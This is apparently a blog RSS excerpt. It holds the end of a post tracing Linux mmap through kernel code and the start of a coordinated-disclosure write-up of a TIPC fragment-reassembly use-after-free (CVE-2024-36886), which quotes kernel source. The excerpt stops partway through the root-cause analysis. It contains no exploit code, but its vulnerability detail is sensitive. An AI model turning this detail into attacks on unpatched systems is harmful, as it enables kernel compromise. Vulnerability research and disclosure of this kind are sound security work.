}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">arch/x86/kernel/sys_x86_64.c</a> (v6.11.5)</figcaption></figure><p>Now we have a starting point, let&apos;s start exploring! <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">__x64_sys_mmap()</a></code> starts off validating the <code>off</code> field, making sure it&apos;s page aligned (i.e. a multiple of <code>PAGE_SIZE</code>) [0] and then shifting it so that <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476">ksys_mmap_pgoff()</a></code> gets the page offset (instead of the byte offset) [1].</p><h3 id="ksysmmappgoff"><code>ksys_mmap_pgoff()</code></h3><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long ksys_mmap_pgoff(unsigned long addr, unsigned long len,
			      unsigned long prot, unsigned long flags,
			      unsigned long fd, unsigned long pgoff)
{
	struct file *file = NULL;
	unsigned long retval;

	if (!(flags &amp; MAP_ANONYMOUS)) {
		// SNIP, we have this flag set!
	} else if (flags &amp; MAP_HUGETLB) {
		// SNIP, we don&apos;t have this flag set!
	}

	retval = vm_mmap_pgoff(file, addr, len, prot, flags, pgoff);
out_fput:
	if (file)
		fput(file);
	return retval;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476">mm/mmap.c</a> (v6.11.5)</figcaption></figure><p>Well this one&apos;s nice and simple for us anonymous mappers! As there&apos;s no <code>file</code> involved and we&apos;re not using huge pages<sup><a href="https://docs.kernel.org/admin-guide/mm/hugetlbpage.html">[3]</a></sup> we cruise on into <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">vm_mmap_pgoff()</a></code>.</p><h3 id="vmmmappgoff"><code>vm_mmap_pgoff()</code></h3><p>Hopefully we&apos;re warmed up now, as we&apos;ve got a bit more going on here! </p><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long vm_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff)
{
	unsigned long ret;
	struct mm_struct *mm = current-&gt;mm;          // [0]
	unsigned long populate;
	LIST_HEAD(uf);

	ret = security_mmap_file(file, prot, flag);  // [1]
	if (!ret) {
		if (mmap_write_lock_killable(mm))    // [2]
			return -EINTR;
		ret = do_mmap(file, addr, len, prot, flag, 0, pgoff, &amp;populate,
			      &amp;uf);
		mmap_write_unlock(mm);
		userfaultfd_unmap_complete(mm, &amp;uf);
		if (populate)
			mm_populate(ret, populate);
	}
	return ret;
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">mm/util.c</a> (v6.11.5)</figcaption></figure><h4 id="fetching-our-mmstruct">Fetching Our <code>mm_struct</code></h4><p>First we fetch a reference to an <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code> [0] which, as we covered earlier, is a key structure that provides a description of a process&apos; virtual address space. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2024/12/image.png" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="720" height="382" srcset="https://sam4k.com/content/images/size/w600/2024/12/image.png 600w, https://sam4k.com/content/images/2024/12/image.png 720w" sizes="(min-width: 720px) 720px"><figcaption>stolen from some of my old slides</figcaption></figure><p>But whose <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code> are we grabbing? The kernel maintains a thread (i.e. a kernel stack) for each userspace process. When a userspace process makes a system call, the kernel executes in the &quot;context&quot; of that process, using its associated kernel stack. </p><p>Along with its own kernel stack, each process has a <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758">task_struct</a></code> which keeps important data about the process, such as its <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code>.
When the kernel is executing in a process&apos;s context, it can fetch the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758">task_struct</a></code> of the associated userspace process via <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52">current</a></code>. </p><p><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52">current</a></code> is a definition for <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L44">get_current()</a></code>, which returns the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758">task_struct</a></code> of the &quot;current&quot; kernel thread; from there we can fetch our <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code> from the task&apos;s <code>mm</code> member.</p><h4 id="a-bit-of-security">A Bit Of Security</h4><p>Next up we do some security checks [1], via <code>security_mmap_file()</code>. Generally, if we see a kernel function with the <code>security_</code> prefix, it&apos;s a hook belonging to the kernel&apos;s modular security framework<sup><a href="https://docs.kernel.org/admin-guide/LSM/index.html">[6]</a></sup>. </p><p>Looking at the code we&apos;ll notice two definitions<sup><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053">[4]</a><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849">[5]</a></sup>, depending on whether <code><a href="https://cateee.net/lkddb/web-lkddb/SECURITY.html">CONFIG_SECURITY</a></code> is enabled. We&apos;ll consider the default case, where it is enabled:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">/**
 * security_mmap_file() - Check if mmap&apos;ing a file is allowed
 * @file: file
 * @prot: protection applied by the kernel
 * @flags: flags
 *
 * Check permissions for a mmap operation.  The @file may be NULL, e.g. if
 * mapping anonymous memory.
 *
 * Return: Returns 0 if permission is granted.
 */
int security_mmap_file(struct file *file, unsigned long prot,
		       unsigned long flags)
{
	return call_int_hook(mmap_file, file, prot, mmap_prot(file, prot),
			     flags);
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2860">/security/security.c</a> (v6.11.5)</figcaption></figure><p>If we look for references to <code>mmap_file</code>, we can see these hooks are registered by the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/lsm_hooks.h#L114">LSM_HOOK_INIT()</a></code> macro and that different security modules implement their own <code>mmap_file</code> hooks (e.g. capabilities, apparmor, selinux, smack). </p><p>Multiple security modules can be active on a system: the capabilities module is always active, along with any number of &quot;minor&quot; modules and up to one &quot;major&quot; module (e.g. apparmor, selinux). We can check which ones are active via <code>/sys/kernel/security/lsm</code>; the output on my VM is: </p><pre><code>$ cat /sys/kernel/security/lsm
lockdown,capability,landlock,yama,apparmor</code></pre><p>Of these, the capability and apparmor security modules both define hooks for <code>mmap_file</code>. In this case, both hooks will be run when <code>security_mmap_file()</code> is called. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/pat_down.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="260" height="236"></figure><p>I hope that was interesting, because in our example neither of these checks actually do anything. Capabilities&apos; <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/commoncap.c#L1436">cap_mmap_file()</a></code> always returns a success and apparmor&apos;s <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/apparmor/lsm.c#L582">apparmor_mmap_file()</a></code> only does checks if a <code>file</code> is specified.</p><h4 id="locking">Locking</h4><p>Before we delve another call deeper into the mm subsystem, let&apos;s quickly talk about locking. The call to <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">do_mmap()</a></code> is protected by the mmap write lock [2]:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long vm_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff)
{
// SNIP
		if (mmap_write_lock_killable(mm))
			return -EINTR;
		ret = do_mmap(file, addr, len, prot, flag, 0, pgoff, &amp;populate,
			      &amp;uf);
mmap_write_unlock(mm);</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">mm/util.c</a> (v6.11.5)</figcaption></figure><p>Locking is extremely important within the kernel and is used to protect shared resources by serialising access or preventing concurrent writes. Insufficient locking can lead to all sorts of undefined behaviour and security issues. </p><p><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117">mmap_write_lock_killable()</a></code> provides a wrapper for the <code>mm-&gt;mmap_lock</code>, which is an R/W semaphore. In layman&apos;s terms, multiple &quot;readers&quot; can take this lock (i.e. if the calling code is just planning to read the protected resource) or a single writer can <sup>[7]</sup>. </p><p>So what does the mmap lock actually protect? That&apos;s a great question, and I&apos;m not sure there&apos;s a definitive, detailed &quot;specification&quot; for this. More generally though, it protects access to a process&apos;s address space. We&apos;ll understand more about what that entails as we delve deeper, but think adding/changing/removing mappings, as well as other fields within the <code>mm</code> structure too <sup>[8]</sup>.</p><p>For the curious, the <code>_killable</code> suffix indicates that the process can be killed while waiting for the lock<sup>[9][10]</sup>. 
If it is killed while waiting, the function returns an error (<code>-EINTR</code>), which is caught here.</p><hr><ol><li><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">https://man7.org/linux/man-pages/man2/mmap.2.html</a></li><li>If you&apos;re testing this at home, be mindful that other places will call <code>do_mmap()</code>, particularly when running a program</li><li><a href="https://docs.kernel.org/admin-guide/mm/hugetlbpage.html">https://docs.kernel.org/admin-guide/mm/hugetlbpage.html</a></li><li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053">https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053</a></li><li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849">https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849</a></li><li><a href="https://docs.kernel.org/admin-guide/LSM/index.html">https://docs.kernel.org/admin-guide/LSM/index.html</a></li><li>Check out Linux Insides&apos; deep dive into semaphores <a href="https://0xax.gitbooks.io/linux-insides/content/SyncPrim/linux-sync-3.html">here</a>.</li><li>LWN has a good article, <a href="https://lwn.net/Articles/893906/">&quot;The ongoing search for mmap_lock scalability&quot;</a> (2022), on the importance of the <code>mmap_lock</code> and attempts to scale it</li><li>The <code>_killable</code> variant for rw semaphores was actually added in 2016; you can check out the <a href="https://lwn.net/Articles/677962/">initial patch series</a> for details</li><li><a href="https://medium.com/geekculture/the-linux-kernel-locking-api-and-shared-objects-1169c2ae88ff">&quot;The Linux Kernel Locking API and Shared Objects&quot;</a> (2021) by Pakt is a nice resource on locking if you want to dive into the topic a bit more</li></ol><h2 id="next-time">Next Time</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/tired_baby.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap 
[0x01]" loading="lazy" width="356" height="200"></figure><p>Hopefully this isn&apos;t too much of a cliffhanger, but this post has been in my drafts for far too long now and I fear if I don&apos;t post it soon it&apos;ll never get finished &#x1F480;.</p><p>I went for a bit of a different approach with this topic, due to the scope of the mm subsystem. The aim was to use a simple case study to provide some structure and context to an otherwise complex topic. I also wanted to present an approach and workflow that could perhaps be transferable to researching other parts of the kernel, if that makes sense?</p><p>If folks are interested in a part 2, we&apos;ll continue to delve deeper into the mm subsystem, carrying on where we left off with <code>do_mmap()</code>. We&apos;ve barely scratched the surface so far! I&apos;d love to go into more detail on how mappings are represented and managed within the kernel and then move on to paging and who knows what other topics we stumble into.</p><p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>]]></content:encoded></item><item><title><![CDATA[ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc]]></title><description><![CDATA[In this post I discuss a vulnerability which allows a local or remote attacker to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel. 
]]></description><link>https://sam4k.com/zdi-24-821-a-remote-use-after-free-in-the-kernels-net-tipc/</link><guid isPermaLink="false">6670c154de619fc1154ef4d4</guid><category><![CDATA[VRED]]></category><category><![CDATA[linux]]></category><category><![CDATA[research]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Wed, 03 Jul 2024 13:59:40 GMT</pubDate><media:content url="https://sam4k.com/content/images/2024/06/computer_wizard.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2024/06/computer_wizard.gif" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc"><p>While preparing for my talk at TyphoonCon, <a href="https://github.com/sam4k/talk-slides/blob/main/so_you_wanna_find_bugs_in_the_linux_kernel.pdf">about how to find bugs in the Linux kernel</a>, I discovered a neat little vulnerability in the kernel&apos;s TIPC networking stack.</p><p>I found this while playing around with syzkaller as part of the research for my talk; I felt like it would only be fair to find some bugs to share if I&apos;m doing a talk about it :)</p><p>I picked the TIPC protocol for a few reasons: it had low coverage, net surface is fun, it&apos;s not enabled by default (not out here trying to find critical RCEs for a slide example) plus I have some previous experience working with the protocol.</p><p>In this post I&apos;m mainly going to be talking about the vulnerability itself, remediation and maybe I&apos;ll go a little bit into exploitation cos I can&apos;t help myself. If I can find the time, I&apos;d love to do a future post talking more about the discovery process and exploitation.</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#overview">Overview</a>
<ul>
<li><a href="#timeline">Timeline</a></li>
</ul>
</li>
<li><a href="#background-stuff">Background Stuff</a>
<ul>
<li><a href="#net-basics">net/ Basics</a>
<ul>
<li><a href="#struct-skbuff">struct sk_buff</a></li>
<li><a href="#struct-skbsharedinfo">struct skb_shared_info</a></li>
</ul>
</li>
<li><a href="#tipc-primer">TIPC Primer</a></li>
</ul>
</li>
<li><a href="#the-vulnerability">The Vulnerability</a>
<ul>
<li><a href="#exploring-the-call-trace">Exploring The Call Trace</a></li>
<li><a href="#examining-tipcbufappend">Examining tipc_buf_append()</a></li>
<li><a href="#variations">Variations</a></li>
</ul>
</li>
<li><a href="#exploitation">Exploitation</a></li>
<li><a href="#fix-remediation">Fix + Remediation</a></li>
<li><a href="#wrapup">Wrapup</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="overview">Overview </h2><p>The vulnerability allows a local or remote attacker to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel. </p><p>Only systems with the TIPC module built (<code>CONFIG_TIPC=y</code>/<code>CONFIG_TIPC=m</code>) and loaded are vulnerable. Additionally, in order to be vulnerable to a remote attack, the system must have TIPC configured on an interface reachable by an attacker.</p><p>The flaw exists in the implementation of TIPC message fragment reassembly, specifically <code>tipc_buf_append()</code>. The function carries out the reassembly by chaining the fragmented packet buffers together. It takes the first fragment as the head buffer and then processes subsequent fragments sequentially, adding their packet buffers onto the head buffer&apos;s chain.</p><p>The vulnerability occurs due to a missing check in the error handling cleanup. On error, the reassembly will bail, freeing both the head buffer (and its chained buffers) and the latest fragment buffer currently being processed. If the latest fragment buffer has already been added to the head buffer&apos;s chain at this point, it will lead to a use-after-free. </p><p>The vulnerability was introduced in commit <a href="https://github.com/torvalds/linux/commit/1149557d64c97dc9adf3103347a1c0e8c06d3b89">1149557d64c9</a> (Mar 2015) and fixed in commit <a href="https://github.com/torvalds/linux/commit/080cbb890286cd794f1ee788bbc5463e2deb7c2b">080cbb890286</a> (May 2024), affecting kernel versions 4 through to 6.8. 
</p><p>It was assigned <a href="https://www.zerodayinitiative.com/advisories/ZDI-24-821/">ZDI-24-821</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-36886">CVE-2024-36886</a> (shoutout to the insane description formatting on that one).</p><h3 id="timeline">Timeline</h3><ul><li>2024-03-23: Case opened with ZDI</li><li>2024-04-25: Case reviewed by ZDI</li><li>2024-04-25: Case disclosed to the vendor </li><li>2024-05-02: Fix published by the vendor</li><li>2024-06-20: Coordinated public release of ZDI advisory</li></ul><h2 id="background-stuff">Background Stuff</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/04/pepe_silvia.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="480" height="304"></figure><p>Before we dive into the juicy details, I&apos;m going to cover some background information to provide some additional context to the vulnerability. Feel free to skip this if you&apos;re already familiar with the networking subsystem and TIPC basics! </p><h3 id="net-basics"><code>net/</code> Basics</h3><p>So to kick things off let&apos;s try and give a bit of background on some of the networking subsystem fundamentals, as this is where the TIPC protocol is implemented! </p><p>I say try, because this subsystem is pretty complex and there&apos;s a lot of ground to cover. But in short, the networking subsystem does what it says on the tin: provides networking capability to the kernel. And it does it in a way which is modular and extensible, providing a core API to implement various networking devices, protocols and interfaces.</p><h4 id="struct-skbuff"><code>struct sk_buff</code></h4><p>One of the fundamental structures that the kernel provides is <code><a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L842">struct sk_buff</a></code>, which represents a network packet and its status. 
The structure is created when a packet is received, either from user space or from the network interface.<sup><a href="https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking">[3]</a></sup></p><p>The kernel documentation honestly does a great job unpacking this rather complicated structure, so I&apos;d recommend <a href="https://docs.kernel.org/networking/skbuff.html">checking that out</a> (up to the checksum section at least).</p><p>Essentially, <code>struct sk_buff</code> itself stores various metadata, and the actual packet data is stored in associated buffers. A large part of the complexity surrounding the structure is how these buffers, and the relevant pointers to them, are accessed and manipulated.</p><h4 id="struct-skbsharedinfo"><code>struct skb_shared_info</code> </h4><p>One of the features baked into this core API is packet fragmentation, the idea that a protocol&apos;s data may be split across several packets - so we have a situation where some data is fragmented across the data buffers of several <code>struct sk_buff</code>s.</p><p>This is where <code><a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572">struct skb_shared_info</a></code> comes in! </p><figure class="kg-card kg-code-card"><pre><code>/* This data is invariant across clones and lives at
 * the end of the header data, ie. at skb-&gt;end.
 */
struct skb_shared_info {
	__u8		flags;
	__u8		meta_len;
	__u8		nr_frags;
	__u8		tx_flags;
	unsigned short	gso_size;
	/* Warning: this field is not always filled in (UFO)! */
	unsigned short	gso_segs;
	struct sk_buff	*frag_list;
	struct skb_shared_hwtstamps hwtstamps;
	unsigned int	gso_type;
	u32		tskey;

	/*
	 * Warning : all fields before dataref are cleared in __alloc_skb()
	 */
	atomic_t	dataref;
	unsigned int	xdp_frags_size;

	/* Intermediate layers must ensure that destructor_arg
	 * remains valid until skb destructor */
	void *		destructor_arg;

	/* must be last field, see pskb_expand_head() */
	skb_frag_t	frags[MAX_SKB_FRAGS];
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572">include/linux/skbuff.h</a> (6.7.4)</figcaption></figure><p>Among other things, this allows a packet to keep track of its fragments! Relevant to us is <code>frag_list</code>, used to link <code>struct sk_buff</code> headers together for reassembly. </p><h3 id="tipc-primer">TIPC Primer</h3><p>Transparent Inter Process Communication (TIPC) is an IPC mechanism designed for intra-cluster communication, originating from Ericsson where it has been used in carrier grade cluster applications for many years. Cluster topology is managed around the concept of nodes and the links between these nodes.</p><p>TIPC communications are done over a &quot;bearer&quot;, which is a TIPC abstraction of a network interface. A &quot;media&quot; is a bearer type, of which there are four currently supported: Ethernet, Infiniband, UDP/IPv4 and UDP/IPv6.</p><p>A local attacker is able to set up a UDP bearer as an unprivileged user via netlink, as demonstrated by bl@sty during his work on CVE-2021-43267<sup><a href="https://haxx.in/posts/pwning-tipc/">[1]</a></sup>. However, a remote attacker is restricted by whatever bearers are already set up on a system.</p><p>TIPC messages have their own header, of which there are several formats outlined in the specification<sup><a href="http://tipc.io/protocol.html">[2]</a></sup>. A common theme is the concept of message &quot;user&quot; which defines their purpose (see &quot;Figure 4: TIPC Message Types&quot;<sup><a href="http://tipc.io/protocol.html">[2]</a></sup>) and can be used to infer the format of the TIPC message.</p><p>There is a handshake to establish a link between nodes (see &quot;Link Creation&quot;<sup><a href="http://tipc.io/protocol.html">[2]</a></sup>). An established link is required to reach the vulnerable code. 
This essentially involves sending three messages to advertise the node, reset the state and then set the state.</p><hr><ol><li><a href="https://haxx.in/posts/pwning-tipc/">Exploiting CVE-2021-43267</a></li><li><a href="http://tipc.io/protocol.html">TIPC Protocol Documentation</a></li><li><a href="https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking">https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking</a></li><li><a href="https://docs.kernel.org/networking/skbuff.html">https://docs.kernel.org/networking/skbuff.html</a></li></ol><h2 id="the-vulnerability">The Vulnerability </h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/04/here_we_go.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="480" height="270"></figure><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x1F913;</div><div class="kg-callout-text">For this example I&apos;m going to be assuming a local attacker interacting with message fragmentation over a UDP bearer, after establishing a link, on a 6.7.4 kernel.</div></div><p>The TIPC protocol features message fragmentation, where a single TIPC message can be split into fragments and sent to its destination via several packets:</p><blockquote>When a message is longer than the identified MTU of the link it will use, it is split up in fragments, each being sent in separate packets to the destination node. Each fragment is wrapped into a packet headed by an TIPC internal header [...] The User field of the header is set to MSG_FRAGMENTER, and each fragment is assigned a Fragment Number relative to the first fragment of the message. Each fragmented message is also assigned a Fragmented Message Number, to be present in all fragments. [...] 
At reception the fragments are reassembled so that the original message is recreated, and then delivered upwards to the destination port. <sup>[1]</sup></blockquote><p>So essentially, each fragment is wrapped up in a TIPC fragment message (a message with the <code>MSG_FRAGMENTER</code> user). Each of these fragment messages will provide metadata in its header, such as the fragment number, so that the fragment within can be reassembled in the right order on the receiving end. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/07/frags_example-4.png" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="707" height="317" srcset="https://sam4k.com/content/images/size/w600/2024/07/frags_example-4.png 600w, https://sam4k.com/content/images/2024/07/frags_example-4.png 707w"></figure><h4 id="exploring-the-call-trace">Exploring The Call Trace</h4><p>Let&apos;s take a look at the kernel call trace for a <code>MSG_FRAGMENTER</code> message being received by a TIPC UDP bearer. This gives us a bit of context about how the TIPC networking stack handles incoming packets:</p><pre><code>#0 tipc_link_input+0x41b/0x850 net/tipc/link.c:1339
#1 tipc_link_rcv+0x77a/0x2dc0 net/tipc/link.c:1839
#2 tipc_rcv+0x519/0x3030 net/tipc/node.c:2159
#3 tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
#4 udp_queue_rcv_one_skb+0xe76/0x19b0 net/ipv4/udp.c:2113
#5 udp_queue_rcv_skb+0x136/0xa60 net/ipv4/udp.c:2191
</code></pre><p>#5 &amp; #4 show the underlying UDP networking stack stuff. #3 is where TIPC first receives inbound TIPC-over-UDP messages, which does some basic bearer level checks before handing the <code>skb</code> over to #2, <code>tipc_rcv()</code>.</p><p>After bearer level checks, all inbound TIPC packets are processed by #2, <code>tipc_rcv()</code>. This involves sanity checks on TIPC header values and using a combination of message user and link state to figure out how the packet is going to be processed.</p><p>A valid <code>MSG_FRAGMENTER</code> message is received by #1, <code>tipc_link_rcv()</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">int tipc_link_rcv(struct tipc_link *l, struct sk_buff *skb,
          struct sk_buff_head *xmitq)
{
    struct sk_buff_head *defq = &amp;l-&gt;deferdq;
    struct tipc_msg *hdr = buf_msg(skb);
    u16 seqno, rcv_nxt, win_lim;
    int released = 0;
    int rc = 0;

    /* Verify and update link state */
    if (unlikely(msg_user(hdr) == LINK_PROTOCOL))
        return tipc_link_proto_rcv(l, skb, xmitq);

    /* Don&apos;t send probe at next timeout expiration */
    l-&gt;silent_intv_cnt = 0;

    do {
        hdr = buf_msg(skb);
        seqno = msg_seqno(hdr);                                                 [0]
        rcv_nxt = l-&gt;rcv_nxt;                                                   [1]
        win_lim = rcv_nxt + TIPC_MAX_LINK_WIN;

        if (unlikely(!link_is_up(l))) {
            if (l-&gt;state == LINK_ESTABLISHING)
                rc = TIPC_LINK_UP_EVT;
            kfree_skb(skb);
            break;
        }

        /* Drop if outside receive window */
        if (unlikely(less(seqno, rcv_nxt) || more(seqno, win_lim))) {           [2]
            l-&gt;stats.duplicates++;
            kfree_skb(skb);
            break;
        }
        released += tipc_link_advance_transmq(l, l, msg_ack(hdr), 0,
                              NULL, NULL, NULL, NULL);

        /* Defer delivery if sequence gap */
        if (unlikely(seqno != rcv_nxt)) {                                       [3]
            if (!__tipc_skb_queue_sorted(defq, seqno, skb))
                l-&gt;stats.duplicates++;
            rc |= tipc_link_build_nack_msg(l, xmitq);
            break;
        }

        /* Deliver packet */
        l-&gt;rcv_nxt++;
        l-&gt;stats.recv_pkts++;

        if (unlikely(msg_user(hdr) == TUNNEL_PROTOCOL))
            rc |= tipc_link_tnl_rcv(l, skb, l-&gt;inputq);
        else if (!tipc_data_input(l, skb, l-&gt;inputq))
            rc |= tipc_link_input(l, skb, l-&gt;inputq, &amp;l-&gt;reasm_buf);            [5]
        if (unlikely(++l-&gt;rcv_unacked &gt;= TIPC_MIN_LINK_WIN))
            rc |= tipc_link_build_state_msg(l, xmitq);
        if (unlikely(rc &amp; ~TIPC_LINK_SND_STATE))
            break;
    } while ((skb = __tipc_skb_dequeue(defq, l-&gt;rcv_nxt)));                     [4]

    /* Forward queues and wake up waiting users */
    if (released) {
        tipc_link_update_cwin(l, released, 0);
        tipc_link_advance_backlog(l, xmitq);
        if (unlikely(!skb_queue_empty(&amp;l-&gt;wakeupq)))
            link_prepare_wakeup(l);
    }
    return rc;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/link.c#L1786">net/tipc/link.c</a> (6.7.4)</figcaption></figure><p><code>tipc_link_rcv()</code> uses the sequence number, pulled from the TIPC message header [0], to determine the order in which to process the incoming <code>skb</code>s. It uses <code>struct tipc_link</code> to manage the link state, including what <code>seqno</code> it&apos;s expecting next [1].</p><p>Out of order packets are either dropped [2] or added to the defer queue, <code>defq</code>, for later [3] [4]. When the correct <code>seqno</code> is hit, it will do some checks to see how to process it. When the user is <code>MSG_FRAGMENTER</code>, the packet is passed to #0 <code>tipc_link_input()</code> [5].</p><p><code>tipc_link_input()</code>, #0, processes the packet depending on the user:</p><figure class="kg-card kg-code-card"><pre><code>static int tipc_link_input(struct tipc_link *l, struct sk_buff *skb,
               struct sk_buff_head *inputq,
               struct sk_buff **reasm_skb)
{
    // snip

    } else if (usr == MSG_FRAGMENTER) {
        l-&gt;stats.recv_fragments++;
        if (tipc_buf_append(reasm_skb, &amp;skb)) {
            l-&gt;stats.recv_fragmented++;
            tipc_data_input(l, skb, inputq);
        } else if (!*reasm_skb &amp;&amp; !link_is_bc_rcvlink(l)) {
            pr_warn_ratelimited(&quot;Unable to build fragment list\n&quot;);
            return tipc_link_fsm_evt(l, LINK_FAILURE_EVT);
        }
        return 0;
    } // snip
    
    kfree_skb(skb);
    return 0;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/link.c#L1319">net/tipc/link.c</a> (6.7.4)</figcaption></figure><h3 id="examining-tipcbufappend">Examining <code>tipc_buf_append()</code></h3><p>This function is the root cause of the vulnerability. <code>tipc_buf_append()</code> is used to append the buffers containing message fragments, in order to reassemble the original message:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">/* tipc_buf_append(): Append a buffer to the fragment list of another buffer
 * @*headbuf: in:  NULL for first frag, otherwise value returned from prev call
 *            out: set when successful non-complete reassembly, otherwise NULL
 * @*buf:     in:  the buffer to append. Always defined
 *            out: head buf after successful complete reassembly, otherwise NULL
 * Returns 1 when reassembly complete, otherwise 0
 */
int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
{
	struct sk_buff *head = *headbuf;
	struct sk_buff *frag = *buf;
	struct sk_buff *tail = NULL;
	struct tipc_msg *msg;
	u32 fragid;
	int delta;
	bool headstolen;

	if (!frag)
		goto err;

	msg = buf_msg(frag);
	fragid = msg_type(msg);                                     [0]
	frag-&gt;next = NULL;
	skb_pull(frag, msg_hdr_sz(msg));

	if (fragid == FIRST_FRAGMENT) {
		if (unlikely(head))
			goto err;
		*buf = NULL;
		if (skb_has_frag_list(frag) &amp;&amp; __skb_linearize(frag))
			goto err;
		frag = skb_unshare(frag, GFP_ATOMIC);
		if (unlikely(!frag))
			goto err;
		head = *headbuf = frag;                                 [1]
		TIPC_SKB_CB(head)-&gt;tail = NULL;
		return 0;
	}

	if (!head)
		goto err;

	if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {    [2]
		kfree_skb_partial(frag, headstolen);
	} else {                                                    [3]
		tail = TIPC_SKB_CB(head)-&gt;tail;
		if (!skb_has_frag_list(head))
			skb_shinfo(head)-&gt;frag_list = frag;
		else
			tail-&gt;next = frag;
		head-&gt;truesize += frag-&gt;truesize;
		head-&gt;data_len += frag-&gt;len;
		head-&gt;len += frag-&gt;len;
		TIPC_SKB_CB(head)-&gt;tail = frag;
	}

	if (fragid == LAST_FRAGMENT) {
		TIPC_SKB_CB(head)-&gt;validated = 0;
		if (unlikely(!tipc_msg_validate(&amp;head)))                [4]
			goto err;                                           [5]
		*buf = head;
		TIPC_SKB_CB(head)-&gt;tail = NULL;
		*headbuf = NULL;
		return 1;
